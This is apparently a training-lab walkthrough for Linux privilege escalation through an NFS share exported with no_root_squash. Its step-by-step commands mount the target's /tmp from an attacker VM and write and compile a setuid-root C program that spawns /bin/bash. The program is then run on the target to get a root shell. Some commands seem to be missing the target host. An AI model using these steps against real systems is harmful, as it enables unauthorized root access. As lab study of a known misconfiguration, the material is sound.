NFS Root Squashing


Linux VM

1. In command line type: cat /etc/exports

2. From the output, notice that “no_root_squash” option is defined for the “/tmp” export.


Attacker VM

1. Open command prompt and type: showmount -e

2. In command prompt type: mkdir /tmp/1

3. In command prompt type: mount -o rw,vers=2 /tmp/1

In command prompt type:

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c

4. In command prompt type: gcc /tmp/1/x.c -o /tmp/1/x

5. In command prompt type: chmod +s /tmp/1/x

Linux VM

1. In command prompt type: /tmp/x

2. In command prompt type: id

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